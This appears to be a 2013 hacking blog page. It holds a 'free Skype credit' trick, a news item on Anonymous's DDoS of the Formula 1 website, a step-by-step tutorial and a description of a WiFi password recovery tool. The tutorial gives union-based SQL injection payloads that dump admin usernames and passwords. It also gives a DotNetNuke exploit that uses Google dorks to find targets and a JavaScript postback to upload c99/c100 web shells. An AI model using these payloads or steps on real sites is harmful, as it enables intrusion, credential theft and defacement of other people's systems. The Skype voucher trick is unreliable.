Search This Blog

Wednesday, 8 May 2013

How to Hack Free Skype Credits | 100% Working (2013)

 how to get free skype credit !!
1) Download hotspot shield vpn and connect to it.
Download VPN Here DOWNLOAD 

2) After connecting this vpn open below link


3) After that click on free voucher code. That gives you voucher code .

4) After completing that, login to your skype account . put that voucher code. And add credit in you account.

Note: Must conncet with hotspot shield vpn.


Otherwise this trick is not working.

Anonymous Hacks Formula 1 Website

                    
Hacking Group Anonymous recently brought down the website of Formula 1 !
They did it by DDos-Distributed Deniel of Services attack. The website which was attacked is www.formula1.com
The F1 world was already in news because of controversial hosting of Grand Prix in Bahrain this weekend where protest are taking place before this attack on the website took place.
Anonymous hackers also defaced another website associated with Fromula 1 racing and also posted a press release.
The message was against the King Hamad bin Ali Khalifa of Bahrain. A part of the exact message posted :

For over one year the people of Bahrain have struggled against the oppressive regime of King Hamad bin Al Khalifa. They have been murdered in the streets, run over with vehicles, beaten, tortured, tear gassed, kidnapped by police, had their businesses vandalised by police, and have tear gas thrown in to their homes on a nightly basis.

Still the regmine persists to deny any meaningful reform and continues to use brutal and violent tactics to oppress the popular calls for reformation. Not only is the Human Rights situation in Bahrain tragic, it becomes more drastic with each passing day. For these reasons the F1 Grand Prix in Bahrain should be strongly opposed. The Al Khalifa regime stands to profit heavily off the race and has promised to use live ammunition against protestors in preparation. They have already begun issuing collective punishment to entire villages for protests and have promised further retribution "to keep order" for the F1 events in Bahrain. The Formula 1 racing authority was well-aware of the Human Rights situation in Bahrain and still chose to contribute to the regime's oppression of civilians and will be punished.
In the DDoS attack which anonymous used a large number of computers ping the website together at the same time which result in overloading of the server.
DDoS attack is considered as one of the best used and favourite attacks of Anonymous as earlier this month Anonymous had launched DDoS attack against websites of British Home Office and 10 Down Street.

Learn How To Hack Websites With Different Techniques.. (EDUCATIONAL PURPOSE ONLY)

SQL Injection in MySQL Databases:-

SQL Injection attacks are code injections that exploit the database layer of the application. This is most commonly the MySQL database, but there are techniques to carry out this attack in other databases such as Oracle. In this tutorial i will be showing you the steps to carry out the attack on a MySQL Database.

Step 1:

When testing a website for SQL Injection vulnerabilities, you need to find a page that looks like this:
www.site.com/page=1

or
www.site.com/id=5

Basically the site needs to have an = then a number or a string, but most commonly a number. Once you have found a page like this, we test for vulnerability by simply entering a ' after the number in the url. For example:

www.site.com/page=1'

If the database is vulnerable, the page will spit out a MySQL error such as;

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/wwwprof/public_html/readnews.php on line 29

If the page loads as normal then the database is not vulnerable, and the website is not vulnerable to SQL Injection.

Step 2


Now we need to find the number of union columns in the database. We do this using the "order by" command. We do this by entering "order by 1--", "order by 2--" and so on until we receive a page error. For example:

www.site.com/page=1 order by 1--
http://www.site.com/page=1 order by 2--
http://www.site.com/page=1 order by 3--
http://www.site.com/page=1 order by 4--
http://www.site.com/page=1 order by 5--

If we receive another MySQL error here, then that means we have 4 columns. If the site errored on "order by 9" then we would have 8 columns. If this does not work, instead of -- after the number, change it with /*, as they are two difference prefixes and if one works the other tends not too. It just depends on the way the database is configured as to which prefix is used.

Step 3


We now are going to use the "union" command to find the vulnerable columns. So we enter after the url, union all select (number of columns)--,
for example:
www.site.com/page=1 union all select 1,2,3,4--

This is what we would enter if we have 4 columns. If you have 7 columns you would put,union all select 1,2,3,4,5,6,7-- If this is done successfully the page should show a couple of numbers somewhere on the page. For example, 2 and 3. This means columns 2 and 3 are vulnerable.


Step 4


We now need to find the database version, name and user. We do this by replacing the vulnerable column numbers with the following commands:
user()
database()
version()
or if these dont work try...
@@user
@@version
@@database

For example the url would look like:
www.site.com/page=1 union all select 1,user(),version(),4--

The resulting page would then show the database user and then the MySQL version. For example admin@localhost and MySQL 5.0.83.
IMPORTANT: If the version is 5 and above read on to carry out the attack, if it is 4 and below, you have to brute force or guess the table and column names, programs can be used to do this.

Step 5


In this step our aim is to list all the table names in the database. To do this we enter the following command after the url.
UNION SELECT 1,table_name,3,4 FROM information_schema.tables--
So the url would look like:
www.site.com/page=1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables--

Remember the "table_name" goes in the vulnerable column number you found earlier. If this command is entered correctly, the page should show all the tables in the database, so look for tables that may contain useful information such as passwords, so look for admin tables or member or user tables.

Step 6

In this Step we want to list all the column names in the database, to do this we use the following command:

union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--
So the url would look like this:
www.site.com/page=1 union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--
This command makes the page spit out ALL the column names in the database. So again, look for interesting names such as user,email and password.

Step 7


Finally we need to dump the data, so say we want to get the "username" and "password" fields, from table "admin" we would use the following command,
union all select 1,2,group_concat(username,0x3a,password),4 from admin--
So the url would look like this:
www.site.com/page=1 union all select 1,2,group_concat(username,0x3a,password),4 from admin--

Here the "concat" command matches up the username with the password so you dont have to guess, if this command is successful then you should be presented with a page full of usernames and passwords from the website

Portal Hacking (DNN) Technique:-


       One more hacking method called "Portal Hacking (DNN)". This method also uses in google search engine to find hackable sites.. Here U can use only Google Dorks for
hacking a websites..

Here U can use dez two Google Dorks

1- inurl:"/portals/0"

2- inurl:/tabid/36/language/en-US/Default.aspx


You can also modify this google dork according to your need & requirement

Here is the exploit
Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

Step 1 :
http://www.google.com

Step 2:
Now enter this dork
:inurl:/tabid/36/language/en-US/Default.aspx
this is a dork to find the Portal Vulnerable sites, use it wisely.


Step 3:
you will find many sites, Select the site which you are comfortable with.

Step 4:
For example take this site.

http://www.abc.com/Home/tabid/36/Lan...S/Default.aspx

Step 5: Now replace
/Home/tabid/36/Language/en-US/Default.aspx

with this
/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx




Step 6: You will get a Link Gallary page.So far so good!

Step 7: Dont do anything for now,wait for the next step...

Step 8: Now replace the URL in the address bar with a Simple Script

javascript:__doPostBack('ctlURL$cmdUpload','')


Step 9: You will Find the Upload Option

Step 10:
Select Root

Step 11:
Upload your package Your Shell c99,c100 , Images, etc

After running this JAVA script, you will see the option for Upload Selected File Now select you page file which you have  & upload here.
Now  Go to main page and refresh. you have seen hacked the website.


Done..!!

WiFi Password Decryptor (2013)

It automatically recovers all type of Wireless Keys/Passwords (WEP/WPA/WPA2 etc) stored by Windows Wireless Configuration Manager.

For each recovered WiFi account, it displays following information
  • WiFi Name (SSID)
  • Security Settings (WEP-64/WEP-128/WPA2/AES/TKIP)
  • Password Type
  • Password in clear text
After the successful recovery you can save the password list to HTML/XML/TEXT file. You can also right click on any of the displayed account and quickly copy the password.
Under the hood, 'WiFi Password Decryptor' uses System Service method (instead of injecting into LSASS.exe) to decrypt the WiFi passwords. This makes it more safer and reliable. Also it makes us to have just single EXE to work on both 32-bit & 64-bit platforms.

New version 1.5 supports command-line version making it useful for automation & penetration testers.
It has been successfully tested on Windows Vista and higher operating systems including Windows 8.



Features & Benefits

  • Instantly decrypt and recover stored WiFi account passwords
  • Recovers all type of Wireless Keys/Passwords (WEP/WPA/WPA2 etc)
  • Command-line version for automation & penetration testers.
  • Simple & elegant GUI interface makes it easy to use.
  • Right click context menu to quickly copy the Password
  • Sort feature to arrange the displayed passwords
  • Save the recovered WiFi password list to HTML/XML/TEXT file.
  • Integrated Installer for assisting you in local Installation & Uninstallation.


WiFi Password Secrets

Depending on the platform, 'Wireless Configuration Manager' uses different techniques and storage locations to securely store the WiFi settings.

On Vista and higher systems all the wireless parameters including SSID, Authentication method & encrypted Password are stored at following file,

C:\ProgramData\Microsoft\Wlansvc\Profiles\Interfaces\{xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}\{Random-GUID}.xml

Here each wireless device is represented by its interface GUID {xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx} and all the wireless settings for this device are stored in XML file with random GUID name.

WiFiPasswordDecryptor showing recovered passwords


If you are interested to know how these WiFi settings are stored and how 'WiFi Password Decyptor' actually recovers the passwords, read on to our research article,
Exposing the WiFi Password Secrets


 
Installation & Uninstallation

WiFi Password Decryptor comes with Installer to make it easier to install it locally on your system for regular usage. This installer has intuitive wizard which guides you through series of steps in completion of installation.

At any point of time, you can uninstall the product using the Uninstaller located at following location (by default)

[Windows 32 bit]
C:\Program Files\SecurityXploded\WiFiPasswordDecryptor

[Windows 64 bit]
C:\Program Files (x86)\SecurityXploded\WiFiPasswordDecryptor


 
How to Use?

WiFiPasswordDecryptor is easy to use with its simple GUI interface. Note that you need to have administrative privileges to run this tool.

Here are the brief usage details
 
Using GUI Version
  • Launch WiFiPasswordDecryptor on your system
  • Next click on 'Start Recovery' button and all stored WiFi account passwords will be recovered & displayed as shown in screenshot 1 below.
  • You can right click on any of the displayed account to quickly copy the password
  • Also can generated detailed password recovery report in HTML/XML/Text format by clicking on 'Export' button and then select the type of file from the drop down box of 'Save File Dialog'.
Using Command-line Version
 
Here is the typical usage of command line version
WiFiPasswordDecryptor.exe  "<output_file path>"
 
Here are some of the examples

//Writes recovered password to text file in current directory
WiFiPasswordDecryptor.exe  output.txt

//Writes recovered password to HTML file in current directory
WiFiPasswordDecryptor.exe  output.html

//Writes recovered password to XML file in current directory
WiFiPasswordDecryptor.exe  output.xml

//Writes recovered password to TEXT file
WiFiPasswordDecryptor.exe  "c:\my test\passlist.txt"
 

It automatically detects the mode (HTML/XML/Text) by using the extension of the specified file (html/xml/txt). By default (or if no extension is specified) it uses the TEXT mode. For more examples refer to Screenshot 2 below.
 
Limitations

This tool can recover the WiFi Passwords configured by Windows Wirelss Configuration Manager only. Also it does not work on older operating systems like Windows XP, 2003.It works well with Vista & all the higher versions.

Screenshots

Here are the screenshots of WiFiPasswordDecryptor

Screenshot 1: WiFi Password Decryptor showing all the Recovered WiFi account Passwords.

WiFiPasswordDecryptor showing recovered passwords

Screenshot 2: Command-line usage of WiFi Password Decryptor.

WiFiPasswordDecryptor

Screenshot 3: Detailed HTML report of all the recovered WiFi account Passwords

WiFiPasswordDecryptor


 
Release History:

Version 1.5 :  2nd Jan 2013
Now supports command-line version making it useful for automation & pen testers.

Version 1.0 :  4th Dec 2012
First public release of WiFiPasswordDecryptor

Disclaimer:

WiFiPasswordDecryptor is not hacking or cracking tool. It is designed for good purpose to help users to recover the lost Wireless account password.

Like any tool its use either good or bad, depends upon the user who uses it. However author is not responsible for any damage caused due to misuse of this tool.

Read our complete License & Disclaimer Policy.

 License  : Freeware
Platform : Vista, Windows 7, Windows 2008, Windows 8 
Blogger Widgets